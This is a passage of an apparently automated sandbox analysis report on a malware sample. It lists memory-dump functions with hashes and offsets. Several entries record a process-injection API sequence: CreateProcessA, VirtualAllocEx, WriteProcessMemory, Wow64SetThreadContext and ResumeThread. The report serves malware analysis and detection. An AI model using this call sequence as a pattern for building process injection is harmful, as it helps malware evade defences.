Instruction ID: 4228b760fb21cf2d1a11bcb01eddd18a77836f799c5f36bce2f06ba0660220b7
Opcode Fuzzy Hash: b4f143c74657c6c21163f0a24482466f5e1409e09bdbb30b11123031179c046b
Instruction Fuzzy Hash: 2AB1E2719092858FC706CF24C8A56997FB1FFA2301B16869BE8439F797C331E956CB42

Function 00AD1B5A Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d032fbcd40563167ee98ac7babaf86300c70a621a57bae50e0fe0cd1a65f28a9
Instruction ID: 4b28a58832d374c6fa96fc3498e0c3818fa4ec04a0303c037d2724014eebb115
Opcode Fuzzy Hash: d032fbcd40563167ee98ac7babaf86300c70a621a57bae50e0fe0cd1a65f28a9
Instruction Fuzzy Hash: F0B1E3715092858FC702CF24C8A4A997FB1FFA2305B16869BE8439F797C335E956CB42

Function 00AD1DE9 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060d0f685d1b8942eaf781d766dfdd19dc69fafa0fa2f0a08ca93bb9564b1c40
Instruction ID: 09a9eb907629af666f724253d77bd6c7190e0aef4fb09b1ac6fd61e7e6bbb187
Opcode Fuzzy Hash: 060d0f685d1b8942eaf781d766dfdd19dc69fafa0fa2f0a08ca93bb9564b1c40
Instruction Fuzzy Hash: 4BB1E17150D6858FC702CF24C8A4A997FB1FFA2301B16869BE8439F697C335E956CB42

Function 00AD202C Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eadb3f48dc8d400f1887d62076005d2122a01a9097246572534d9129a4da563c
Instruction ID: 9c178134915ff5f0cc9a3287d7c546d070be478a6a957db0073563a9c355a239
Opcode Fuzzy Hash: eadb3f48dc8d400f1887d62076005d2122a01a9097246572534d9129a4da563c
Instruction Fuzzy Hash: 3AB1C0715092858FC702CF24C8A4A997FB1FFA2301B16869BE8439F697C335E956CB46

Function 00AD1C30 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e959ef3f68fe2c9eed9afb8a3a0d25d06f108d424d9ee316da7708ba8a83cc26
Instruction ID: 72330bf6f4fab3490501c0d2e009257521289e699f46eaeff890fbd1d7f9fc35
Opcode Fuzzy Hash: e959ef3f68fe2c9eed9afb8a3a0d25d06f108d424d9ee316da7708ba8a83cc26
Instruction Fuzzy Hash: CAB1E2715092858FC702CF24C8A4A997FB1FFA2305B16869BE8439F797C331D956CB46

Function 00AD1C61 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba0d5e14ea6d7b1819132108c11055d27ad671911da6531a5b913cd8435b19c1
Instruction ID: 3bdb1168437ade145edb522323f00c906202e962874aca82d29118d42d283ca7
Opcode Fuzzy Hash: ba0d5e14ea6d7b1819132108c11055d27ad671911da6531a5b913cd8435b19c1
Instruction Fuzzy Hash: 3CB1F4715092858FC702CF24C8A4A997FB1FFA2301B16869BE8439F697C331E956CB42

Function 00AD1E8D Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bad00aa631083661e022970fa44b38cf79ce13d90ba0b9fa603c5a78814ad8b
Instruction ID: 661b4575887cbb9d4ec0751416eaa00e47cf58c1e3845b71579bc7edd6a57225
Opcode Fuzzy Hash: 4bad00aa631083661e022970fa44b38cf79ce13d90ba0b9fa603c5a78814ad8b
Instruction Fuzzy Hash: 0DB1E2715092858FC702CF34C8A46997FB1FFA2301B16869BE8439F697C331D956CB42

Function 00AD2163 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c1252bef401f52413207257d677f3b03614dafb7391c3a828b744be8cbd578
Instruction ID: d78e4d5bb41c158e26cb4dfc0bc164e2c61b39345e0531f90283297375477436
Opcode Fuzzy Hash: 01c1252bef401f52413207257d677f3b03614dafb7391c3a828b744be8cbd578
Instruction Fuzzy Hash: B0A1EF7190D2858FCB06CF24C8A46997FB1FFA2301B16869BE8439F697C331D956CB42

Function 00AD2288 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3401bc7fe2980eec4c793d2aa66a5fdc403a9b9f24c5eae61dc9b822c03243
Instruction ID: 1a34f7c54af64eb8759524e99018dd963c89de7d3c0104d062667360b4fea478
Opcode Fuzzy Hash: 6b3401bc7fe2980eec4c793d2aa66a5fdc403a9b9f24c5eae61dc9b822c03243
Instruction Fuzzy Hash: DC61BE71A04201CFC715CF58D888AAABBB2FFA5300B224497E8179F7A5C735ED81DB85

Function 08F8B704 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F8B946

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b8d1af74744d2a759f3c20e076d8cb9530934da5980fe40debc67ef88c4f7ab2
Instruction ID: d25d753114b5c2aa45073178c8e46a33f37b4d9a969415ba23a6237cdaed53d0
Opcode Fuzzy Hash: b8d1af74744d2a759f3c20e076d8cb9530934da5980fe40debc67ef88c4f7ab2
Instruction Fuzzy Hash: 4BA15C71D00359CFEB24DF68C841BEDBBB2BF48321F1481A9E819A7250DB749986CF91

Function 08F8B710 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F8B946

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9c8eddd40a09541a33f060c9b78bd347e3bc168ff9c45b42f7b39723b3b93ea5
Instruction ID: 72832b00bba12a49d408fccb132bde5822638b0773ff64ce62b7bcc0ada228e9
Opcode Fuzzy Hash: 9c8eddd40a09541a33f060c9b78bd347e3bc168ff9c45b42f7b39723b3b93ea5
Instruction Fuzzy Hash: 1B915C71D00359CFEF24DF69C841BADBBB2BF48321F1481A9E819A7250DB749986CF91

Function 04C74ADC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04C77901

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 04790fe570535b70c15010d753920f249f99b4c17b5a5daabc31959c1657df47
Instruction ID: 9b1f412bb51cae025b2ac4c92e6e7394659d3b0162b3e47b8617f4fec2b0a141
Opcode Fuzzy Hash: 04790fe570535b70c15010d753920f249f99b4c17b5a5daabc31959c1657df47
Instruction Fuzzy Hash: 3C411AB5901309CFDB14CF96C448AAABBF6FF88314F248499D519AB321D774B941CFA1

Function 00AD8E94 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD8F51

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1a10439ef268930df387021069d65a5165012369bc383f8230004897b550374a
Instruction ID: e84c6404a6ae9d473cfeb8e3b56f7b4c7ad9ce613575f61ec5055c1ae9f51949
Opcode Fuzzy Hash: 1a10439ef268930df387021069d65a5165012369bc383f8230004897b550374a
Instruction Fuzzy Hash: 1D41C171C00719CFEB24DFA9C844BDEBBB2BF48314F20815AD409AB251DB756946CF90

Function 00AD7A3C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD8F51

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b0e29db5a4cc182e5fa2bc016c2ae03849bb5c336cadc6d7dc67dfc27ee593c9
Instruction ID: 9157efb8b38b628b1e0d5d0b5c404fe6026a767a8f704c6854b67eac423ed980
Opcode Fuzzy Hash: b0e29db5a4cc182e5fa2bc016c2ae03849bb5c336cadc6d7dc67dfc27ee593c9
Instruction Fuzzy Hash: 6E41D171C00719CFEB24DFAAC844B9EBBF6BF48704F20816AD409AB251DB756946CF90

Function 04C752B6 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C7538A

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7a7fe23f4d4c3452b30d5d78c141d6e3a21cea3508f0d62cf96b4cc4820c1b33
Instruction ID: 616c3466cbb40dc401b32e64b218caad2534ab925532371374e9acfd66a4b0fd
Opcode Fuzzy Hash: 7a7fe23f4d4c3452b30d5d78c141d6e3a21cea3508f0d62cf96b4cc4820c1b33
Instruction Fuzzy Hash: DC41C3B1D00309EFDB15CF99D884ADEBBF2BF88314F24812AE515AB250D775A985CF90

Function 08F8B483 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F8B518

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dcb9b9e48d736ace3356b0efa7bc517e68af3fa0273fde9899591462e02aff0f
Instruction ID: e61231f2f7ce1c1cf8177171153d522e024ad02de5c5bb8a7eb523822bfd79f3
Opcode Fuzzy Hash: dcb9b9e48d736ace3356b0efa7bc517e68af3fa0273fde9899591462e02aff0f
Instruction Fuzzy Hash: 342102B5D003499FDB10DFA9C881BEEBBF5FF48320F10842AE919A7250C7799955CBA4

Function 08F8B488 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F8B518

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: aa8b02f5fb1d2c759443b477d35d86fa1cb0b233bf180fc7c10925c47f7c38c0
Instruction ID: f53702c6528a8b77d9cdc51642f15120555aa9bd8de83005ef9827508afb4a32
Opcode Fuzzy Hash: aa8b02f5fb1d2c759443b477d35d86fa1cb0b233bf180fc7c10925c47f7c38c0
Instruction Fuzzy Hash: C9212675D003499FDB10DFAAC881BDEBBF5FF48320F508429E919A7240C7789951CBA4

Function 08F8AEB0 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F8AF36

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 720b78f062e8a719b57a5f17ecae036b5f7607f3bbe86c49d32cf18190a43f2c
Instruction ID: 64df873e48468984962bf477f0a7573014eeba00ea2269655f693e084e008dca
Opcode Fuzzy Hash: 720b78f062e8a719b57a5f17ecae036b5f7607f3bbe86c49d32cf18190a43f2c
Instruction Fuzzy Hash: C22155B1D00249CFDB10DFAAC485BAEBBF4EF48320F54842EE459A7281C7789945CBA5

Function 08F8B570 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F8B5F8

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 20ee3d1ca48e60bc8c7d8d00f817098dcd5adac2badbbdccf10df90334111eb3
Instruction ID: fadd4f243678fca84a71eb8925d8c94d7c1e47cf4fa4173be6f8fc2568a9cbc3
Opcode Fuzzy Hash: 20ee3d1ca48e60bc8c7d8d00f817098dcd5adac2badbbdccf10df90334111eb3
Instruction Fuzzy Hash: 13211371C003499FDB10DFAAC881AEEBBF1FF48320F50842EE959A7250C7399901CBA5

Function 08F8AEB8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F8AF36

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c37bda3acb488923c18d2e8a4c5a97bceca23a08836dc6e7923261460de60429
Instruction ID: db442a1db2b97c1a1be6a648b00d503fec6f38003891e9e04d4fb964108b6927
Opcode Fuzzy Hash: c37bda3acb488923c18d2e8a4c5a97bceca23a08836dc6e7923261460de60429
Instruction Fuzzy Hash: 732115B1D003098FDB20DFAAC485BAEBBF4EF48320F54842ED559A7240CB789945CFA5

Function 08F8B578 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F8B5F8

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e272da0e62af8d85c0ce3acbf39f975abe36d30fe169a621a1d26b21b74c0295
Instruction ID: 44ba3343ee436f27dbd5f4bd89e821d7e2a003fb1fc74b4b59a2f1f07b2ce263
Opcode Fuzzy Hash: e272da0e62af8d85c0ce3acbf39f975abe36d30fe169a621a1d26b21b74c0295
Instruction Fuzzy Hash: C221E671C003599FDB10DFAAC881BDEBBF5FF48320F508429E919A7250DB799941CBA5

Function 08F8AE00 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08F8AE6A

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3976dc2d9fa49d592de38e177e5cab8de46c28d5308e6d82f97bf12be0cee1a9
Instruction ID: 3ecce3db55be9424068c9d2f9ef282d35f999fa6a5c12eea54d048a73140c14a
Opcode Fuzzy Hash: 3976dc2d9fa49d592de38e177e5cab8de46c28d5308e6d82f97bf12be0cee1a9
Instruction Fuzzy Hash: C4119771C043888FDB20DFAAC445BEEBFF5EF89320F24885EC499A7241C6795901CBA5

Function 08F8B3C3 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F8B436

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0c491e527c0d4a3000e9b9ad46903ac96595c4485da5417ae7b606c35b393e1d
Instruction ID: b607c284de26623fdbc2317f364dcc153770a0ab1ed5148f28cc03e47dadb40c
Opcode Fuzzy Hash: 0c491e527c0d4a3000e9b9ad46903ac96595c4485da5417ae7b606c35b393e1d
Instruction Fuzzy Hash: EF114471C003499FDB20DFAAC845BEEBBF5EF88320F24841AE515A7250CB759951CFA4

Function 08F8B3C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F8B436

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 41d9b5a6ce0ea4bee49d6aec5e51b71dd7f9129543e3a4aedb3dbaab3203301e
Instruction ID: a8a1a5605e2dd87e8565da2ea579d87d351529bb2694596b1235f9eff29533f2
Opcode Fuzzy Hash: 41d9b5a6ce0ea4bee49d6aec5e51b71dd7f9129543e3a4aedb3dbaab3203301e
Instruction Fuzzy Hash: 30112371C003499FDB20DFAAC845BDEBBF5EF48320F248419E919A7250CB79A951CFA4

Function 08F8D998 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08F8D9FD

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 64fbc4bf698ad9cba12ed6caf36fa2a62e29f65f57c7e519733f82997a755f1d
Instruction ID: 4c67c57d803213a31506227bd37d97c3cbab47507087b37e80983dedcd47c043
Opcode Fuzzy Hash: 64fbc4bf698ad9cba12ed6caf36fa2a62e29f65f57c7e519733f82997a755f1d
Instruction Fuzzy Hash: B81134B5804348DFDB10EFAAD485BDEBFF8EB48320F208419D454A7241C375A944CFA5

Function 08F8AE08 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08F8AE6A

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ce861b7a9dac69be1685fc67577f09888ba03af2721e2136f19e658c402f91ca
Instruction ID: 47f10ab7ad04630fb4de962e380f3b3c2a24d53ce93e9d09bdd25285cd63a81f
Opcode Fuzzy Hash: ce861b7a9dac69be1685fc67577f09888ba03af2721e2136f19e658c402f91ca
Instruction Fuzzy Hash: C0113A71D003498FDB20DFAAC44579FFBF5EB88320F24881AD519A7240CB796941CFA5

Function 08F897E0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08F8D9FD

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6fd133a593afafb64320e1711c84d419c7dc4e0d439bbfd6f9a4726a3bb8f923
Instruction ID: b985b41737b7266d3bbe5b0536d055e61a0adc0e8c9e2e564065d9867e5fa764
Opcode Fuzzy Hash: 6fd133a593afafb64320e1711c84d419c7dc4e0d439bbfd6f9a4726a3bb8f923
Instruction Fuzzy Hash: 2C1106B5804349DFDB20EF9AC445BDEFBF8EB48310F108459E519A7240C375A944CFA5

Function 00ADE898 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00ADE8FE

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 49950dc4199a15e49ab25039a782b953e29d8fda4c38ffb621d22da533804eeb
Instruction ID: f9394ccb844bf64534bd035dbbe1c1327daafde0261c359cc23492174402cc1f
Opcode Fuzzy Hash: 49950dc4199a15e49ab25039a782b953e29d8fda4c38ffb621d22da533804eeb
Instruction Fuzzy Hash: E211DFB5C002498FDB20DF9AC444A9EFBF4EB88324F10846AD429A7210C379A945CFA5

Function 00A5D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1417483637.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a5d000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6349e747aefb984fae1c274c637d773723010f4b31db5c81e3efb8b31ea1151
Instruction ID: d2a69eec80ce5454e29347cbd215d10c038b0c4fce18647cea6e70fe0496001a
Opcode Fuzzy Hash: a6349e747aefb984fae1c274c637d773723010f4b31db5c81e3efb8b31ea1151
Instruction Fuzzy Hash: AC21D075604200DFDB24DF14D9C4B16BB65FB84325F20C569DC4A4B296C33AD84BCA62

Function 00A5D005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1417483637.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a5d000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8035d931cf33e7863e117b7edfa3f984a19eb2ce47c7ec6d6f3a14ccfffc2e2
Instruction ID: 55a5079956c910f8a51dca32224386d09900098e152bf26528fc20bcedbf6cdc
Opcode Fuzzy Hash: f8035d931cf33e7863e117b7edfa3f984a19eb2ce47c7ec6d6f3a14ccfffc2e2
Instruction Fuzzy Hash: 4F2162755093808FDB16CF24D994715BF71FB46314F28C5DAD8498B6A7C33A980ACB62

Non-executed Functions

Function 00AD1350 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

Q$00, xrefs: 00AD1468

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: Q$00
API String ID: 0-2486067128
Opcode ID: 4ebe64230aabeb2f506a83792eb19fe8b7bd871821436fde543168e0b467f152
Instruction ID: 9978910a0d172d539fb8ca9b91f48ed8c37a21ace9405d1989f9deeb668a9de3
Opcode Fuzzy Hash: 4ebe64230aabeb2f506a83792eb19fe8b7bd871821436fde543168e0b467f152
Instruction Fuzzy Hash: DB510471A082558FC704CFAAD99016ABBF6FBCA301B6984ABD447DB752C234CD42CB51

Function 00AD1650 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

NDq*, xrefs: 00AD16F7

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: NDq*
API String ID: 0-3229832303
Opcode ID: 8bdbdab13edb530e63424279561e9d28f81c80bffaa0fbb1b929da83051be7dd
Instruction ID: 5efc7225845cf4112e9ddbc64ceaa7717a05fbeda21f2fec20ba86a3c93571de
Opcode Fuzzy Hash: 8bdbdab13edb530e63424279561e9d28f81c80bffaa0fbb1b929da83051be7dd
Instruction Fuzzy Hash: 40512631A096559FC315CFB8C85159AFBF2BB82350718C66BD807CBB52C730D956C792

Function 04C735B8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91019e43f07dfe6422b3b3d8186c58c65558dccbc69d1d49808fd26a78faeea
Instruction ID: 1810ec85c605d79cc931b7106fc13a80a5064c0379050b95d36cc32f5d815a1e
Opcode Fuzzy Hash: a91019e43f07dfe6422b3b3d8186c58c65558dccbc69d1d49808fd26a78faeea
Instruction Fuzzy Hash: F11285B1C81745CBD710CF65E84E18D7BB2BB85318FD06B09D2A21A2E5DBB415EACF48

Function 08F88B00 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218eb4b4bc107ae978cc210dda8d7afeb96f20a1e8c63849e5862a4de263798c
Instruction ID: a9c4349c1f84ec11dcc279b03216380a72b5733810a56b3b5283dede0e29f3c5
Opcode Fuzzy Hash: 218eb4b4bc107ae978cc210dda8d7afeb96f20a1e8c63849e5862a4de263798c
Instruction Fuzzy Hash: 14E10774E10219CFDB14DFA9C580AAEFBB2BF89345F248269D415AB359D730AD42CF60

Function 08F8AF90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

